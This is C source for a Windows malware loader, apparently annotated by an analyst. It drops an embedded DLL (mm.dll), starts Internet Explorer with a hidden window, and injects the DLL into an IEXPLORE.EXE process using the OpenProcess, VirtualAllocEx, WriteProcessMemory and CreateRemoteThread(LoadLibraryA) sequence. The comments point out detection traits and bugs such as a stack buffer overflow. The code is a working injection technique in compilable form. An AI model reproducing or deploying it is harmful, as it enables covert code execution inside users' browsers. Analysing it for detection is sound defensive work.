#include "stdafx.h"
#pragma comment(linker,"/ENTRY:subin /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")
#include"windows.h"
#include"tlhelp32.h"
#include "Winuser.h"
#include "resource.h"
/*
 * Drop the embedded binary resource ID_MAGICDEL_DLL (type RC_BINARYTYPE) of
 * this module to disk under `filename`.
 *
 * Analyst notes: the file is created with CREATE_ALWAYS, so an existing file of
 * that name is overwritten; `filename` is used as given (the caller passes a
 * relative name, so the drop location is the process's current directory).
 * None of FindResource/LoadResource/LockResource/SizeofResource/CreateFile/
 * WriteFile results are checked, so a failed lookup or open is silently ignored.
 * No return value; success cannot be observed by the caller.
 */
void WriteResourceToFile(char const *filename)
{
HINSTANCE hInstance=GetModuleHandle(NULL);
HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
MAKEINTRESOURCE(RC_BINARYTYPE));
HGLOBAL hgRes = LoadResource(hInstance, hResInfo);
void *pvRes = LockResource(hgRes);
DWORD cbRes = SizeofResource(hInstance, hResInfo);
/* Exclusive (share mode 0) write handle; overwrites any existing file. */
HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, 0);
DWORD cbWritten;
/* Raw copy of the resource bytes; cbWritten is never compared against cbRes. */
WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);
CloseHandle(hFile);
}
/*
 * Custom entry point (selected by the /ENTRY:subin linker option at the top of
 * the file). Behaviour, in order:
 *   1. drop the embedded resource to "mm.dll" in the current directory;
 *   2. start IEXPLORE.EXE from its fixed Program Files path with a hidden window;
 *   3. walk a Toolhelp process snapshot and take the FIRST process whose image
 *      name matches "IEXPLORE.EXE" (case-insensitive) -- the PID returned in
 *      `pi` is not used, so this need not be the instance started in step 2;
 *   4. write the full path of mm.dll into that process and start a remote thread
 *      on kernel32!LoadLibraryA, i.e. classic DLL injection.
 *
 * Detection-relevant traits visible here: hidden-window browser launch,
 * OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx -> WriteProcessMemory ->
 * CreateRemoteThread(LoadLibraryA) sequence, and a DLL dropped next to the
 * loader. Return value is meaningless: 0 on snapshot failure, otherwise the
 * function falls off the end without a return statement (undefined in C).
 */
int subin()
{
WriteResourceToFile("mm.dll");
STARTUPINFO si; // structure that must be initialised before process start
PROCESS_INFORMATION pi; // information about the started process (never closed or used)
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.wShowWindow = SW_HIDE;// window show setting; SW_HIDE keeps the window hidden
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
/* Hard-coded 32-bit Program Files path; result of CreateProcess is ignored. */
CreateProcess("C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE",
NULL,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
HANDLE hS;
hS = CreateToolhelp32Snapshot ( TH32CS_SNAPPROCESS, 0 ) ;
if ( hS == INVALID_HANDLE_VALUE)
{
return 0;
}
char IPname[] = "IEXPLORE.EXE" ;
PROCESSENTRY32 pe;
pe.dwSize=sizeof(PROCESSENTRY32);
BOOL fOk ;
for(fOk = Process32First ( hS, &pe ) ; fOk; fOk = Process32Next( hS, &pe ) )
{
//MessageBox(NULL,TEXT(pe.szExeFile),TEXT("MICHAEL"),0);
/* Match by image name only; first hit wins (see header comment). */
if (!strcmpi(IPname,pe.szExeFile))
{
HANDLE process=OpenProcess( PROCESS_ALL_ACCESS, false, pe.th32ProcessID ) ;
char szdll[128];
/* Unbounded strcat after a 128-byte GetCurrentDirectory: a long current
 * directory overflows szdll. */
GetCurrentDirectory(128,szdll);
strcat(szdll,"\\mm.dll");
LPVOID psr;
/* idl = 129: one byte more than szdll holds, so WriteProcessMemory below
 * reads one byte past the end of the local array. */
int idl=sizeof(szdll)+1;
psr=VirtualAllocEx(process,NULL,idl,MEM_COMMIT,PAGE_READWRITE);
WriteProcessMemory(process,psr,(LPVOID)szdll,idl,NULL);
HMODULE hM;
LPTHREAD_START_ROUTINE fnSA;
hM = GetModuleHandle ( "kernel32.DLL" ) ;
/* Relies on kernel32 being mapped at the same base in the target. */
fnSA=(LPTHREAD_START_ROUTINE) GetProcAddress(hM,"LoadLibraryA");
HANDLE hin=NULL;
/* Remote thread handle `hin` is never closed or waited on. */
hin=CreateRemoteThread(process,NULL,0,fnSA,psr,0,NULL);
if( hS != NULL )
CloseHandle ( hS ) ;// close the process snapshot (only on this path; leaked when no match)
CloseHandle (process) ;
break ;
}
}
}